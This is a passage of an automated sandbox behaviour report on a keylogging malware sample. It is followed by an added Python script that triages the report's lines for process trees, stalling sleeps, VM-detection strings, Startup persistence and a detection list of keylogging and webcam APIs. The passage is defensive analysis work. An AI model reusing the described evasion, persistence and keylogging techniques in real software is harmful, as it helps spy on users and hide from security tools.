        Source: C:\Users\user\Desktop\ESjy0irMIn.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\essam@sasa2023.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\splwow64.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
        Source: C:\Users\user\Desktop\ESjy0irMIn.exe TID: 6644 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\ProgramData\essam@sasa2023.exe TID: 7176 Thread sleep time: -30000s >= -30000s
        Source: C:\ProgramData\essam@sasa2023.exe TID: 7176 Thread sleep count: 290 > 30
        Source: C:\ProgramData\essam@sasa2023.exe TID: 7176 Thread sleep time: -290000s >= -30000s
        Source: C:\ProgramData\essam@sasa2023.exe TID: 7460 Thread sleep count: 3617 > 30
        Source: C:\ProgramData\essam@sasa2023.exe TID: 7176 Thread sleep count: 5490 > 30
        Source: C:\ProgramData\essam@sasa2023.exe TID: 7176 Thread sleep time: -5490000s >= -30000s
        Source: C:\ProgramData\essam@sasa2023.exe TID: 7652 Thread sleep time: -30000s >= -30000s
        Source: C:\ProgramData\essam@sasa2023.exe TID: 7668 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe Evasive API call chain: GetLocalTime,DecisionNodes graph_2-16715
        Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
        Source: C:\Windows\splwow64.exe Last function: Thread delayed
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep graph_2-15707
        Source: C:\Users\user\Desktop\ESjy0irMIn.exe Thread delayed: delay time: 922337203685477
        Source: C:\ProgramData\essam@sasa2023.exe Thread delayed: delay time: 922337203685477
        Source: C:\ProgramData\essam@sasa2023.exe Window / User API: threadDelayed 3617
        Source: C:\ProgramData\essam@sasa2023.exe Window / User API: threadDelayed 5490
        Source: C:\ProgramData\essam@sasa2023.exe Window / User API: foregroundWindowGot 1764
        Source: C:\Windows\splwow64.exe Window / User API: threadDelayed 9036
        Source: C:\Windows\splwow64.exe Window / User API: threadDelayed 908
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe Check user administrative privileges: GetTokenInformation,DecisionNodes graph_4-82003
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe Dropped PE file which has not been started: C:\b53dd3b256ba71dad061693a386e\2052\SetupResources.dll
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe Dropped PE file which has not been started: C:\b53dd3b256ba71dad061693a386e\1049\SetupResources.dll
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe Dropped PE file which has not been started: C:\b53dd3b256ba71dad061693a386e\1043\SetupResources.dll
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe Dropped PE file which has not been started: C:\b53dd3b256ba71dad061693a386e\1044\SetupResources.dll
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe Dropped PE file which has not been started: C:\b53dd3b256ba71dad061693a386e\1042\SetupResources.dll
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe Dropped PE file which has not been started: C:\b53dd3b256ba71dad061693a386e\1045\SetupResources.dll
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe Dropped PE file which has not been started: C:\b53dd3b256ba71dad061693a386e\1046\SetupResources.dll
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe Dropped PE file which has not been started: C:\b53dd3b256ba71dad061693a386e\1025\SetupResources.dll
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe Dropped PE file which has not been started: C:\b53dd3b256ba71dad061693a386e\1055\SetupResources.dll
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe Dropped PE file which has not been started: C:\b53dd3b256ba71dad061693a386e\3082\SetupResources.dll
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe Dropped PE file which has not been started: C:\b53dd3b256ba71dad061693a386e\1053\SetupResources.dll
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe Dropped PE file which has not been started: C:\b53dd3b256ba71dad061693a386e\1029\SetupResources.dll
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe Dropped PE file which has not been started: C:\b53dd3b256ba71dad061693a386e\1028\SetupResources.dll
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe Dropped PE file which has not been started: C:\b53dd3b256ba71dad061693a386e\1033\SetupResources.dll
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe Dropped PE file which has not been started: C:\b53dd3b256ba71dad061693a386e\1035\SetupResources.dll
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe Dropped PE file which has not been started: C:\b53dd3b256ba71dad061693a386e\SetupUtility.exe
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe Dropped PE file which has not been started: C:\b53dd3b256ba71dad061693a386e\1031\SetupResources.dll
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe Dropped PE file which has not been started: C:\b53dd3b256ba71dad061693a386e\1036\SetupResources.dll
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe Dropped PE file which has not been started: C:\b53dd3b256ba71dad061693a386e\2070\SetupResources.dll
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe Dropped PE file which has not been started: C:\b53dd3b256ba71dad061693a386e\1032\SetupResources.dll
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe Dropped PE file which has not been started: C:\b53dd3b256ba71dad061693a386e\1030\SetupResources.dll
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe Dropped PE file which has not been started: C:\b53dd3b256ba71dad061693a386e\1040\SetupResources.dll
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe Dropped PE file which has not been started: C:\b53dd3b256ba71dad061693a386e\1041\SetupResources.dll
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe Dropped PE file which has not been started: C:\b53dd3b256ba71dad061693a386e\1037\SetupResources.dll
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe Dropped PE file which has not been started: C:\b53dd3b256ba71dad061693a386e\1038\SetupResources.dll
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe Dropped PE file which has not been started: C:\b53dd3b256ba71dad061693a386e\3076\SetupResources.dll
        Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\ProgramData\essam@sasa2023.exeThread delayed: delay time: 30000Jump to behavior
        Source: C:\ProgramData\essam@sasa2023.exeThread delayed: delay time: 30000
        Source: C:\ProgramData\essam@sasa2023.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
        Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeCode function: 2_2_0001774A GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLastError,GetLogicalDriveStringsW,CharUpperW,_wcschr,GetDiskFreeSpaceExW,2_2_0001774A
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeAPI call chain: ExitProcess graph end nodegraph_4-82154
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeAPI call chain: ExitProcess graph end nodegraph_4-72865
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
        Source: wscript.exe, 00000007.00000002.1891454999.000001C1BB7B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: wscript.exe, 00000007.00000002.1891454999.000001C1BB7B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
        Source: essam@sasa2023.exe, 00000003.00000002.4193957410.0000000000F10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5"/>
        Source: ESjy0irMIn.exe, 00000000.00000002.1753786714.000000001DE9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ={pDp-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: essam@sasa2023.exe, 0000000B.00000002.1946499918.0000000004CC0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: VBoxService
        Source: netsh.exe, 00000005.00000002.1832796574.00000000012AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeCode function: 2_2_0001CA78 GetSystemInfo,2_2_0001CA78
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeCode function: 2_2_000192BB GetFileAttributesW,GetLastError,SetFileAttributesW,SetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,GetLastError,DeleteFileW,GetLastError,FindNextFileW,GetLastError,FindClose,RemoveDirectoryW,GetLastError,2_2_000192BB
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeCode function: 2_2_0001A7B1 FindFirstFileW,GetLastError,FindNextFileW,CloseHandle,FindClose,2_2_0001A7B1
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_69A88097 memset,memset,FindFirstFileW,DeleteFileW,GetLastError,FindNextFileW,FindClose,4_2_69A88097
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_69A74281 memset,EnterCriticalSection,FindFirstFileW,LeaveCriticalSection,ctype,FindNextFileW,FindClose,ResetEvent,CreateThread,CloseHandle,GetLastError,4_2_69A74281
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_69D85B82 __EH_prolog3_GS,_memset,FindFirstFileW,FindNextFileW,FindClose,4_2_69D85B82
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_69D8410A FindFirstFileW,GetFullPathNameW,SetLastError,_wcsrchr,_wcsrchr,4_2_69D8410A
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeCode function: 2_2_0001B4B3 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,2_2_0001B4B3
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeCode function: 2_2_000291D5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_000291D5
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_69DCC78B VirtualProtect ?,-00000001,00000104,?4_2_69DCC78B
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeCode function: 2_2_0001621F GetTickCount,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,2_2_0001621F
        Source: C:\ProgramData\essam@sasa2023.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeMemory allocated: page read and write | page guardJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeCode function: 2_2_000291D5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_000291D5
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeCode function: 2_2_0002AE73 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0002AE73
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeCode function: 2_2_000297AE SetUnhandledExceptionFilter,2_2_000297AE
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_009A45BE _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_009A45BE
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_009A2BA5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_009A2BA5
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_698FB38A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_698FB38A
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_698F87C1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_698F87C1
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_69A7171F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_69A7171F
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_69DA76A7 __EH_prolog3,GetModuleHandleW,GetProcAddress,SetThreadStackGuarantee,SetUnhandledExceptionFilter,GetCommandLineW,4_2_69DA76A7
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_69DCEB6A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_69DCEB6A
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_69DCB091 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_69DCB091

        HIPS / PFW / Operating System Protection Evasion

        Source: 11.2.essam@sasa2023.exe.4cc0000.5.raw.unpack, kl.cs | Reference to suspicious API methods: MapVirtualKey(a, 0u)
        Source: 11.2.essam@sasa2023.exe.4cc0000.5.raw.unpack, kl.cs | Reference to suspicious API methods: GetAsyncKeyState(num2)
        Source: 11.2.essam@sasa2023.exe.4cc0000.5.raw.unpack, OK.cs | Reference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
        Source: C:\Users\user\Desktop\ESjy0irMIn.exe | Process created: C:\ProgramData\dotNetFx40_Client_setup.exe "C:\ProgramData\dotNetFx40_Client_setup.exe"
        Source: C:\Users\user\Desktop\ESjy0irMIn.exe | Process created: C:\ProgramData\essam@sasa2023.exe "C:\ProgramData\essam@sasa2023.exe"
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe | Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /i "C:\Users\user\AppData\Local\Temp\BlockersInfo1.rtf
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe | Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /i "C:\Users\user\AppData\Local\Temp\BlockersInfo2.rtf
        Source: C:\Windows\System32\wscript.exe | Process created: C:\ProgramData\essam@sasa2023.exe "C:\ProgramData\essam@sasa2023.exe"
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe | Code function: 4_2_69D7DF27 AllocateAndInitializeSid
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe | Code function: 4_2_69DA3657 GetSecurityDescriptorDacl,_malloc,InitializeSecurityDescriptor,_free,GetAclInformation,_malloc,_memcpy_s,SetSecurityDescriptorDacl,_free,_free
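        The signature lines above (the dropped-but-never-started installer files, the 922337203685477 ms and 120000 ms thread delays, the VMware and VBoxService memory strings, the Startup-folder opens by wscript.exe, the Process created chain, and the kl.cs / OK.cs API references) are the raw material of a first-pass triage. The Python script below is an added example written for this page; it is not part of the Joe Sandbox report and not code from the sample. It parses a handful of lines copied from the listing above (a constructed sample, with the Source column and the detail column joined by " | ", which is this example's own convention) into events and pulls out the process tree, long sleeps, hypervisor artifacts, Startup persistence, keylogging / webcam API references and dropped-but-unstarted files. Two practitioner caveats are built in: a delay of 922337203685477 ms is roughly 29,000 years, so that thread never wakes inside the sandbox window, and "Hyper-V RAW" next to mswsock.dll is the Winsock AF_HYPERV provider name that ordinary Windows 10 hosts carry, so it is classed as weak VM evidence. The one-year threshold and the weak/strong split are this example's choices.

```python
"""Triage helper for Joe Sandbox-style behaviour lines.
Added example for this page, not part of the report or of the sample: parses
'Source: <process or dump> | <signature detail>' lines into events."""
import re
from collections import defaultdict

# Constructed sample: lines copied from the report above, with the Source
# column and the detail column joined by " | " (this example's own choice).
SAMPLE_LINES = [
    r"Source: C:\ProgramData\dotNetFx40_Client_setup.exe | Dropped PE file which has not been started: C:\b53dd3b256ba71dad061693a386e\SetupUtility.exe",
    r"Source: C:\Users\user\Desktop\ESjy0irMIn.exe | Thread delayed: delay time: 922337203685477",
    r"Source: C:\ProgramData\essam@sasa2023.exe | Thread delayed: delay time: 30000",
    r"Source: C:\Windows\splwow64.exe | Thread delayed: delay time: 120000",
    "Source: C:\\Windows\\System32\\wscript.exe | File opened: C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\",
    r"Source: essam@sasa2023.exe, 0000000B.00000002.1946499918.0000000004CC0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: VBoxService",
    r"Source: netsh.exe, 00000005.00000002.1832796574.00000000012AB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll",
    r'Source: C:\Users\user\Desktop\ESjy0irMIn.exe | Process created: C:\ProgramData\essam@sasa2023.exe "C:\ProgramData\essam@sasa2023.exe"',
    r'Source: C:\Windows\System32\wscript.exe | Process created: C:\ProgramData\essam@sasa2023.exe "C:\ProgramData\essam@sasa2023.exe"',
    r'Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe | Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /i "C:\Users\user\AppData\Local\Temp\BlockersInfo1.rtf',
    r"Source: 11.2.essam@sasa2023.exe.4cc0000.5.raw.unpack, kl.cs | Reference to suspicious API methods: GetAsyncKeyState(num2)",
    r"Source: 11.2.essam@sasa2023.exe.4cc0000.5.raw.unpack, OK.cs | Reference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)",
]

LINE_RE = re.compile(r"^Source:\s*(?P<source>.+?)\s*\|\s*(?P<detail>.+?)\s*$")
IMAGE_RE = re.compile(r"^(?P<image>[A-Za-z]:\\.*?\.exe)", re.IGNORECASE)  # child image = path up to first .exe
DELAY_RE = re.compile(r"delay time:\s*(\d+)")
VM_MARKERS = ("vmware", "vbox", "virtualbox", "hyper-v", "qemu")
# "Hyper-V RAW" beside mswsock.dll is the Winsock AF_HYPERV provider name,
# present on ordinary Windows 10 hosts, so it only counts as weak evidence.
WEAK_VM_MARKERS = ("mswsock.dll",)
SPY_APIS = ("GetAsyncKeyState", "MapVirtualKey", "SetWindowsHookEx", "capGetDriverDescriptionA")
ONE_YEAR_MS = 365 * 24 * 60 * 60 * 1000


def parse(lines):
    """Turn each report line into {"source", "kind", "value"}; skip anything else."""
    events = []
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            kind, _, value = m["detail"].partition(": ")
            events.append({"source": m["source"], "kind": kind, "value": value})
    return events


def process_tree(events):
    """parent image -> [child images], built from 'Process created' events."""
    tree = defaultdict(list)
    for e in events:
        if e["kind"] == "Process created":
            m = IMAGE_RE.match(e["value"])
            if m:
                tree[e["source"]].append(m["image"])
    return dict(tree)


def long_sleeps(events, threshold_ms=60_000):
    """Thread delays at or above the threshold, longest first.  A delay over a
    year (922337203685477 ms is about 29,000 years) means the thread never
    resumes inside the sandbox window: the run is stalled, not merely slow."""
    found = []
    for e in events:
        m = DELAY_RE.search(e["value"]) if e["kind"] == "Thread delayed" else None
        if m and int(m.group(1)) >= threshold_ms:
            ms = int(m.group(1))
            found.append({"source": e["source"], "ms": ms, "effectively_infinite": ms > ONE_YEAR_MS})
    return sorted(found, key=lambda f: f["ms"], reverse=True)


def vm_artifacts(events):
    """Hypervisor markers in memory strings, split into strong and weak evidence."""
    out = {"strong": [], "weak": []}
    for e in events:
        low = e["value"].lower()
        if e["kind"] == "Binary or memory string" and any(k in low for k in VM_MARKERS):
            bucket = "weak" if any(w in low for w in WEAK_VM_MARKERS) else "strong"
            out[bucket].append({"source": e["source"], "value": e["value"]})
    return out


def startup_persistence(events):
    """Processes that touched the per-user Startup folder."""
    return sorted({e["source"] for e in events if e["kind"] == "File opened"
                   and "\\start menu\\programs\\startup" in e["value"].lower()})


def spy_api_refs(events):
    """(source, api) for decompiled-source references to keylogging / webcam APIs."""
    return [(e["source"], api) for e in events if e["kind"] == "Reference to suspicious API methods"
            for api in SPY_APIS if e["value"].startswith(api + "(")]


def dropped_not_started(events):
    """Dropped PE files that never ran; candidates for separate static analysis."""
    return [e["value"] for e in events if e["kind"] == "Dropped PE file which has not been started"]


def triage(lines):
    """Full first-pass summary for a list of report lines."""
    ev = parse(lines)
    return {"process_tree": process_tree(ev), "long_sleeps": long_sleeps(ev),
            "vm_artifacts": vm_artifacts(ev), "startup_persistence": startup_persistence(ev),
            "spy_api_refs": spy_api_refs(ev), "dropped_not_started": dropped_not_started(ev)}


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_LINES), indent=2))
```

        Run it on the full listing by feeding every "Source:" line of the report through `triage()`; grouping by source is what separates the two dropped binaries, since the CRT-style IsDebuggerPresent / SetUnhandledExceptionFilter chains all come from dotNetFx40_Client_setup.exe and Setup.exe, while the Startup-folder access, the infinite sleep and the kl.cs / OK.cs references belong to ESjy0irMIn.exe, wscript.exe and essam@sasa2023.exe.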
        Source: C:\Users\user\Desktop\ESjy0irMIn.exe | Queries volume information: C:\Users\user\Desktop\ESjy0irMIn.exe VolumeInformation
        Source: C:\Users\user\Desktop\ESjy0irMIn.exe | Queries volume information (VolumeInformation), one query per file, for the following fonts under C:\Windows\Fonts\:
            bahnschrift.ttf, calibril.ttf, calibrii.ttf, calibrili.ttf, calibrib.ttf, calibriz.ttf, cambria.ttc, cambriai.ttf, cambriab.ttf, cambriaz.ttf,
            Candara.ttf, Candaral.ttf, Candarai.ttf, Candarali.ttf, Candarab.ttf, Candaraz.ttf, comic.ttf, comici.ttf, comicbd.ttf, comicz.ttf,
            constan.ttf, constani.ttf, constanb.ttf, constanz.ttf, corbel.ttf, corbell.ttf, corbeli.ttf, corbelli.ttf, corbelb.ttf, corbelz.ttf,
            cour.ttf, couri.ttf, courbd.ttf, courbi.ttf, ebrima.ttf, ebrimabd.ttf, framd.ttf, FRADM.TTF, framdit.ttf, FRADMIT.TTF,
            FRAMDCN.TTF, FRADMCN.TTF, FRAHV.TTF, FRAHVIT.TTF, Gabriola.ttf, gadugi.ttf, gadugib.ttf, georgia.ttf, georgiai.ttf, georgiab.ttf,
            georgiaz.ttf, impact.ttf, Inkfree.ttf, javatext.ttf, LeelawUI.ttf, LeelUIsl.ttf, LeelaUIb.ttf, lucon.ttf, l_10646.ttf, malgun.ttf,
            malgunsl.ttf, malgunbd.ttf, himalaya.ttf, msjh.ttc, msjhl.ttc, msjhbd.ttc, ntailu.ttf, ntailub.ttf, phagspa.ttf, phagspab.ttf,
            micross.ttf, taile.ttf, taileb.ttf, msyh.ttc, msyhl.ttc, msyhbd.ttc, msyi.ttf, mingliub.ttc, monbaiti.ttf, msgothic.ttc,
            mvboli.ttf, mmrtext.ttf, mmrtextb.ttf, Nirmala.ttf, NirmalaS.ttf, NirmalaB.ttf, pala.ttf, palai.ttf, palab.ttf, palabi.ttf,
            segoepr.ttf, segoeprb.ttf, segoesc.ttf, segoescb.ttf, seguihis.ttf, simsun.ttc, simsunb.ttf, Sitka.ttc, SitkaI.ttc, SitkaB.ttc,
            SitkaZ.ttc, sylfaen.ttf, symbol.ttf, tahoma.ttf, tahomabd.ttf, timesi.ttf, timesbd.ttf, timesbi.ttf, trebuc.ttf, trebucit.ttf,
            trebucbd.ttf, trebucbi.ttf, verdana.ttf, verdanai.ttf, verdanab.ttf, verdanaz.ttf, webdings.ttf, wingding.ttf, YuGothR.ttc, YuGothM.ttc,
            YuGothL.ttc, YuGothB.ttc, holomdl2.ttf, AGENCYR.TTF, AGENCYB.TTF, ALGER.TTF, BKANT.TTF, ANTQUAI.TTF, ANTQUAB.TTF, ANTQUABI.TTF,
            ARLRDBD.TTF, BASKVILL.TTF, BAUHS93.TTF, BELL.TTF, BELLI.TTF, BELLB.TTF, BERNHC.TTF, BOD_R.TTF, BOD_I.TTF, BOD_B.TTF,
            BOD_BI.TTF, BOD_CR.TTF, BOD_BLAR.TTF, BOD_CI.TTF, BOD_CB.TTF, BOD_BLAI.TTF, BOD_CBI.TTF, BOD_PSTC.TTF, BOOKOS.TTF, BOOKOSB.TTF,
            BOOKOSI.TTF, BOOKOSBI.TTF, BRADHITC.TTF, BRITANIC.TTF, BRLNSR.TTF, BRLNSDB.TTF, BRLNSB.TTF
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
